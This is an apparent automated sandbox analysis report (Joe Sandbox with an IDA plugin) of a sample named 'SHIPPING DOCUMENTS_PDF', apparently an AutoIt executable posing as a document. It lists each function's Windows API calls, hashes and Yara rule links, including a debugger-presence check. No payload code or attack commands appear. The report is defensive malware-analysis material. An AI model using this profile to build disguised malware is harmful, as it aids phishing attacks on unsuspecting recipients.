                                                                                      • Part of subcall function 00B7336C: DecodePointer.KERNEL32(00000001,?,00B54849,00BA7C74), ref: 00B7337E
                                                                                      • Part of subcall function 00B7336C: EncodePointer.KERNEL32(?,?,00B54849,00BA7C74), ref: 00B73389
                                                                                      • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B54915
                                                                                      • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B5492A
                                                                                      • Part of subcall function 00B53B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                                                                      • Part of subcall function 00B53B3A: IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                                                                      • Part of subcall function 00B53B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                                                      • Part of subcall function 00B53B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B54874
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                    • String ID:
                                                                                    • API String ID: 1438897964-0
                                                                                    • Opcode ID: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                                                                    • Instruction ID: 364d39d37853042a28bf1b4114ff9d195bf8b18bf0256ee60d8827e9f75c7169
                                                                                    • Opcode Fuzzy Hash: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                                                                    • Instruction Fuzzy Hash: D1118C72908341DFC700DF68E845B4EBBE8FB96750F10859EF455872B1DBB09A48CB92
                                                                                    Function 00B70DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                                                      • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                                                      • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000000,?,?,?,00B70DD3,?), ref: 00B7575F
                                                                                    • std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                    • __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                      • Part of subcall function 00B7859B: RaiseException.KERNEL32(?,?,?,00C09E78,00000000,?,?,?,?,00B70E06,?,00C09E78,?,00000001), ref: 00B785F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3902256705-0
                                                                                    • Opcode ID: 6ad7c249e016fde7f4b6fa674787d8b6a5f538fd05588ccfa2f114b50ce5355d
                                                                                    • Instruction ID: c652f340c99ee507b62df535f5670b661ceab5b8fcd1b4cef33456908a211cc2
                                                                                    • Opcode Fuzzy Hash: 6ad7c249e016fde7f4b6fa674787d8b6a5f538fd05588ccfa2f114b50ce5355d
                                                                                    • Instruction Fuzzy Hash: 15F06D3294031DA6DB20BBA5EC469DEB7ECDB05311F1084A6BD2C96281DBB09A9092D1
                                                                                    Function 00B753A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    • __lock_file.LIBCMT ref: 00B753EB
                                                                                      • Part of subcall function 00B76C11: __lock.LIBCMT ref: 00B76C34
                                                                                    • __fclose_nolock.LIBCMT ref: 00B753F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                                                                    • Instruction ID: e7e5c5be7c7bfb4f000a7fa486ef9fa16347b7d7eb00af9f7a86785691a55842
                                                                                    • Opcode Fuzzy Hash: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                                                                    • Instruction Fuzzy Hash: 8CF0BB71800B049AD7316F7598067AD77E06F41374F21C2D8A43DAB1D1CFFC4941AB55
                                                                                    Function 00B5F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2528cfbf440d6e279453c92c95672f5e09585134ef4fb3a47a49da80aa84dd8
                                                                                    • Instruction ID: 5248e81319c10f9ba704a33a6671947bea18d5a14432c4e4ff6e0f8bae34b496
                                                                                    • Opcode Fuzzy Hash: f2528cfbf440d6e279453c92c95672f5e09585134ef4fb3a47a49da80aa84dd8
                                                                                    • Instruction Fuzzy Hash: FD6157B060420ADFDB10EF64C881BBAB7E5EB08305F1484F9ED1A9B291D775ED49CB54
                                                                                    Function 00B70C08 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: 3d547ab254de8bef72e4f021a845cddc3bf60f57939ad4ce22e3e86d10b56eff
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: E731A170A10105DBC71AEF68C4C4A69FBE6FB59300B64C6E6E81ACB355D631EDD1DB80
                                                                                    Function 00B8FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 47d2ebf7719613587cd300b578c8b8fdfb1cdfa4bb2d698f4d67e3fe811efe9d
                                                                                    • Instruction ID: 4eec1f263c4924e4ac5ac5036ef6462709257bc1df3f0b063da847b61d314a78
                                                                                    • Opcode Fuzzy Hash: 47d2ebf7719613587cd300b578c8b8fdfb1cdfa4bb2d698f4d67e3fe811efe9d
                                                                                    • Instruction Fuzzy Hash: 19410574504341DFDB14DF14C494B1ABBE0BF49315F0989ECE99A9B362D732E849CB52
                                                                                    Function 00B57B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: e77cfd7ea101d968f015561bb629678c1e2d437abc8a6018b5055a33b314087b
                                                                                    • Instruction ID: c2c122d59375a4e0c0e11c03a3f0601f70cad71b8d54ba04f0df6a0160629eaf
                                                                                    • Opcode Fuzzy Hash: e77cfd7ea101d968f015561bb629678c1e2d437abc8a6018b5055a33b314087b
                                                                                    • Instruction Fuzzy Hash: A7212472A04A09EBDB10AF21F8817AE7BF4FB14351F2184EAE866C51A0EB30D5D0CB05
                                                                                    Function 00B54DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B54BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00B54BEF
                                                                                      • Part of subcall function 00B7525B: __wfsopen.LIBCMT ref: 00B75266
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                                                                      • Part of subcall function 00B54B6A: FreeLibrary.KERNEL32(00000000), ref: 00B54BA4
                                                                                      • Part of subcall function 00B54C70: _memmove.LIBCMT ref: 00B54CBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1396898556-0
                                                                                    • Opcode ID: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                                                                    • Instruction ID: be2fc6f961dfac910d1e2ab155440e5609404aa3a7643050823dc805b5d3e818
                                                                                    • Opcode Fuzzy Hash: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                                                                    • Instruction Fuzzy Hash: 9E11E731600205ABCF15BF74C817FAD77E4EF44715F1088EEF942A7181EBB19A499B50
                                                                                    Function 00B8FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 6f06c3291974f1874c0f3693b87d0eaf4c2903537967e351e930a762e0639332
                                                                                    • Instruction ID: adac41a0122567ade572ba5242b1470e4ca32e52f736700f1d268a54fb8b6e2c
                                                                                    • Opcode Fuzzy Hash: 6f06c3291974f1874c0f3693b87d0eaf4c2903537967e351e930a762e0639332
                                                                                    • Instruction Fuzzy Hash: 5B211374908301DFCB14EF24C484B2ABBE1BF88315F0589A8F89A57762D731E849CB92
                                                                                    Function 00B74863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock_file.LIBCMT ref: 00B748A6
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2597487223-0
                                                                                    • Opcode ID: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                                                                    • Instruction ID: aa9e47a3c10ee9129a97ac8c4e9e3a85df6bf1a19752aac167786ef099165dc7
                                                                                    • Opcode Fuzzy Hash: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                                                                    • Instruction Fuzzy Hash: 64F0AF31940609ABDF11AFB48C0A7AE36E0EF00326F15C594F43C9A191CB788A51DB52
                                                                                    Function 00B54E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                                                                    • Instruction ID: 3fbf90e2b877e2e508be1796540aabefa7d4b1a77836fc574fd3bb64e55a4e85
                                                                                    • Opcode Fuzzy Hash: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                                                                    • Instruction Fuzzy Hash: E5F03071505751CFCB389F64E495916B7E1FF1432A32089FEE5D782620C7719888DF40
                                                                                    Function 00B70791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2514874351-0
                                                                                    • Opcode ID: f1bb39f329779d57038be80c9ccfa679a1169a5be699662cca4fb43d02c7ef41
                                                                                    • Instruction ID: e27c6dcc4b0fdd45ecdbe31fd6af82f3ead79c63c9f8adbb313681cdf61c5d2d
                                                                                    • Opcode Fuzzy Hash: f1bb39f329779d57038be80c9ccfa679a1169a5be699662cca4fb43d02c7ef41
                                                                                    • Instruction Fuzzy Hash: 74E08636A4512957C720A6589C05FEAB7DDDB887A1F0441F6FC08D7254DD609C818690
                                                                                    Function 00B7525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wfsopen
                                                                                    • String ID:
                                                                                    • API String ID: 197181222-0
                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                    • Instruction ID: ae5fdbd9bffaeb62f312959acb3d908732e55506f676240291793ee9d057d1f6
                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                    • Instruction Fuzzy Hash: 4EB0927644020C77CE112A82EC02A493B5D9B41764F408060FB1C18162A6B3A6649A89
                                                                                    Function 00B91DE4 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00B91DF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: PathTemp
                                                                                    • String ID:
                                                                                    • API String ID: 2920410445-0
                                                                                    • Opcode ID: f39104e2811467417ced57e1e35083aeea30d06377aa3c4f5722cff270c245fe
                                                                                    • Instruction ID: 79fb971e5eb1f9d638d622e82ec97dfbb760cbd55fbf3b471c425871d40d3617
                                                                                    • Opcode Fuzzy Hash: f39104e2811467417ced57e1e35083aeea30d06377aa3c4f5722cff270c245fe
                                                                                    • Instruction Fuzzy Hash: A2C04C7146501B9BDB15A758CCE5AB8737CAB10701F0040E671169205099701B44DE21
                                                                                    Function 009B2F00 Relevance: .1, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033611527.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b2cfbd7daa80ad94e2793bd3b28529a8da4a8c4c2efa7a76c1f818c0c00f0966
                                                                                    • Instruction ID: 7bf94d6842429529a60f4fdf4543a44be7b08913fb70e90fc11d87a83b1a7bf5
                                                                                    • Opcode Fuzzy Hash: b2cfbd7daa80ad94e2793bd3b28529a8da4a8c4c2efa7a76c1f818c0c00f0966
                                                                                    • Instruction Fuzzy Hash: 6B51D8B1A012489BDB48DFA9D555BEE7BE5FF8C310F20863DE909D7690E7349904CB90

                                                                                    Non-executed Functions

                                                                                    Function 00BDCABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BDCB37
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCB95
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BDCBD6
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCC00
                                                                                    • SendMessageW.USER32 ref: 00BDCC29
                                                                                    • _wcsncpy.LIBCMT ref: 00BDCC95
                                                                                    • GetKeyState.USER32(00000011), ref: 00BDCCB6
                                                                                    • GetKeyState.USER32(00000009), ref: 00BDCCC3
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCCD9
                                                                                    • GetKeyState.USER32(00000010), ref: 00BDCCE3
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCD0C
                                                                                    • SendMessageW.USER32 ref: 00BDCD33
                                                                                    • SendMessageW.USER32(?,00001030,?,00BDB348), ref: 00BDCE37
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BDCE4D
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BDCE60
                                                                                    • SetCapture.USER32(?), ref: 00BDCE69
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDCECE
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BDCEDB
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BDCEF5
                                                                                    • ReleaseCapture.USER32 ref: 00BDCF00
                                                                                    • GetCursorPos.USER32(?), ref: 00BDCF3A
                                                                                    • ScreenToClient.USER32(?,?), ref: 00BDCF47
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDCFA3
                                                                                    • SendMessageW.USER32 ref: 00BDCFD1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD00E
                                                                                    • SendMessageW.USER32 ref: 00BDD03D
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BDD05E
